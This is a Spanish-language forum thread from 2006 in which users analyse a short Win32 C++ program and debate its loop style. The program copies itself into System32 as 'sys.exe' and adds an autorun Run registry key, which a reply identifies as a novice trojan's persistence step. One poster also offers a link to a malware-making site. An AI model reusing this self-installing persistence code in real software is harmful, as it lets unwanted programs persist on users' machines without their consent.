¿Qué hace este programa en C++?

X.Cyclop · #1 (**permalink**) 27/03/2006, 15:39

Código:

#include <windows.h>
char win[MAX_PATH]; 
char n [256];  
int WINAPI WinMain (HINSTANCE hThisInstance,
                    HINSTANCE hPrevInstance,
                    LPSTR lpszArgument,
                    int nFunsterStil)
{

HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe,n,256); 
GetWindowsDirectory(win,sizeof(win)); 
strcat(win,"\\System32\\sys.exe"); 
SetErrorMode(SEM_FAILCRITICALERRORS); 
CopyFile(n,win,0); 
HKEY hkey; 
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&hkey);
RegSetValueEx(hkey,"SYsTem",0,REG_SZ,(const unsigned char*)win,sizeof(win));
int i = 1;
do
{
Sleep(6000);                                  
}while(i != 0); 
return 0;
}

Abre el regedit, mete algo en el incio y ¿? ¿Deja hibernando la pc? ... sleep(6000)

TolaWare · #2 (**permalink**) 27/03/2006, 16:18

mmm, la llamada a Sleep no hiberna al PC, duerme a este programa durante 6 segundos hasta que a la variable "i" le asignen 0, pero no veo como esta variable podrà ser modificada, de seguro esa porcion de codigo pretende que el programa se siga ejecutando hasta que apagues tu maquina o cierre forzosamente el mismo.

MaxExtreme · #3 (**permalink**) 28/03/2006, 06:48

Es un maldito ejemplo de troyano para novatos de C++/Win32.

Lo que hace es copiarse a sí mismo en la carpeta system32 con el nombre "sys.exe", y poner en el registro que se autoejecute al iniciar Windows.

Luego, se queda esperando, o en su defecto, puedes poner el código para escuchar conexiones y controlar el PC.

TolaWare · #4 (**permalink**) 28/03/2006, 09:54

por que es para novatos?

X.Cyclop · #5 (**permalink**) 28/03/2006, 10:56

Jeje.

Cita:

Iniciado por Tolaware

por que es para novatos?

Yo pregunto lo mismo.

blackwind · #6 (**permalink**) 28/03/2006, 12:26

Cita:

Iniciado por TolaWare

por que es para novatos?

porque cuando uno es experto, programas que no usen polimorfismo,multihilos, instrucciones en ASM y que sea de al menos de un millon de lineas son para novatos

MaxExtreme · #7 (**permalink**) 28/03/2006, 15:31

Cita:

Iniciado por blackwind

porque cuando uno es experto, programas que no usen polimorfismo,multihilos, instrucciones en ASM y que sea de al menos de un millon de lineas son para novatos

Joe, no me refería a eso.

Es para novatos, porque es lo típico que aprende un newbie en programación que quiere hacer troyanos para Win32 a la 2ª semana de empezar a programar. Y lo que aprender es a poner una entrada en el registro con el nombre del programa, para que se ejecute nada más iniciar el sistema.

¿Por qué es inútil? (o sea, fácil, lo primero que hace un novato)
1. Necesitas ser administrador para realizar esos cambios.
2. Ningún usuario de Windows avanzado permitirá que haya nada en "CurrentVersion/Run".
3. Pocos ejecutan ya programas desconocidos expresamente.
4. etc...

Ejemplos como ese en Visual Basic 6 hay miles. Lo único raro ha sido verlo en C++ O.o

Como empiecen a enseñar a los n00bs/lamers (de la programación o no) a programar cosas cutres así en C++, abandono la programación xD, porque acabará siendo una especie de Visual Basic. Al tiempo.

En cualquier caso, quien haya escrito este código también deja que desear:

Código:

int i = 1;
do
{
	Sleep(6000);
}while(i != 0);

con lo sencillo que es

Código:

bool esperar = true;
while(esperar) Sleep(6000);

No sé por qué, pero el que escribiese el código de arriba parece que intentó "portar" un código de VB6 sin saber C/C++: "do..while" en vez de "while", que se puede escribir seguido sin {}...

X.Cyclop · #8 (**permalink**) 28/03/2006, 15:36

Jajajaja. Entonces el que lo hizo es newbie, lammer e imbecil.

MaxExtreme · #9 (**permalink**) 28/03/2006, 15:43

Cita:

Iniciado por X.Cyclop

Jajajaja. Entonces el que lo hizo es newbie, lammer e imbecil.

No sé, ¿pero para qué andas mirando eso, pillín? ;)

X.Cyclop · #10 (**permalink**) 28/03/2006, 15:50

No se, lo encontré por allí y quise saber que era lo que hacía.

MaxExtreme · #11 (**permalink**) 28/03/2006, 16:43

Cita:

Iniciado por X.Cyclop

No se, lo encontré por allí y quise saber que era lo que hacía.

Ya, ya, ahora di eso, que te hemos visto el plumero.

X.Cyclop · #12 (**permalink**) 28/03/2006, 17:57

Sí, es en serio. Yo si hago malware, hago gusanos buenos, como había dicho... detener el ventilador o cosas locas con Asm, no tonterías con C++.

Eso ni siquiera sirve para el que tenga el TeaTimer (del SpyBot) o el Ad-Watch (del Ad-Aware), apenas detectan un cambio en el registro y ya salen las mil alarmas, por eso digo que es una tontería.

NightDark · #13 (**permalink**) 28/03/2006, 20:06

Cita:

Iniciado por X.Cyclop

Sí, es en serio. Yo si hago malware, hago gusanos buenos, como había dicho... detener el ventilador o cosas locas con Asm, no tonterías con C++.

Sigue soñando amigo mío, sigue soñando...
procura no calificarte ante la gente ;-] a veces el querer insinuar saber mucho puede resultar contraproducente para los que en verdad si saben ;)

un saludo

PD: si quieres de verdad crear malware o dedicarte al research sobre esto y hacer de verdad "gusanos buenos" mandame un privado y te daré un sitio dedicado a eso.

X.Cyclop · #14 (**permalink**) 28/03/2006, 20:30

Cita:

Iniciado por NightDark

Sigue soñando amigo mío, sigue soñando...
procura no calificarte ante la gente ;-] a veces el querer insinuar saber mucho puede resultar contraproducente para los que en verdad si saben ;)

Jajajaja, pero ¿sabes leer?. No me interesa el malware, no pienso aprender C, C++ y Asm para eso.

Cita:

PD: si quieres de verdad crear malware o dedicarte al research sobre esto y hacer de verdad "gusanos buenos" mandame un privado y te daré un sitio dedicado a eso.

No quiero, no me interesa.

Eternal Idol · #15 (**permalink**) 29/03/2006, 05:18

Código:

for (;;)
{
  Sleep(6000);
}

TolaWare · #16 (**permalink**) 29/03/2006, 05:27

Gracias por la respuesta Maxtremme

MaxExtreme · #17 (**permalink**) 29/03/2006, 06:52

Cita:

Iniciado por Eternal Idol

Código:

for (;;)
{
  Sleep(6000);
}

Hombre, eso es un bucle infinito, y no cabe modificar la variables que lo maneja. Si puso la variable supongo que sería por algo, por ejemplo para salir del bucle (aunque también vale un break) modificándola en algún punto o desde fuera del programa, a saber, pero no creo que llegase a ser tan tonto como para creer que es necesario usarla en un bucle do..while, ¿no? O.o

Eternal Idol · #18 (**permalink**) 29/03/2006, 07:08

Cita:

Iniciado por MaxExtreme

Hombre, eso es un bucle infinito, y no cabe modificar la variables que lo maneja. Si puso la variable supongo que sería por algo, por ejemplo para salir del bucle (aunque también vale un break) modificándola en algún punto o desde fuera del programa, a saber, pero no creo que llegase a ser tan tonto como para creer que es necesario usarla en un bucle do..while, ¿no? O.o

¿Y donde se modificaba esa variable? El programa esta completo y no crea ningun otro hilo.
¿Desde fuera del programa? Supongo que en ese ejemplo no exportaban la variable como obtener su direccion y cambiarle el valor desde otro proceso

MaxExtreme · #19 (**permalink**) 29/03/2006, 07:15

Cita:

Iniciado por Eternal Idol

¿Y donde se modificaba esa variable? El programa esta completo y no crea ningun otro hilo.
¿Desde fuera del programa? Supongo que en ese ejemplo no exportaban la variable como obtener su direccion y cambiarle el valor desde otro proceso

Sería el comienzo de un tutorial cutre, donde luego usarían la variable o algo.

O eso, o definitivamente el que escribió ese programa no tenía ni idea.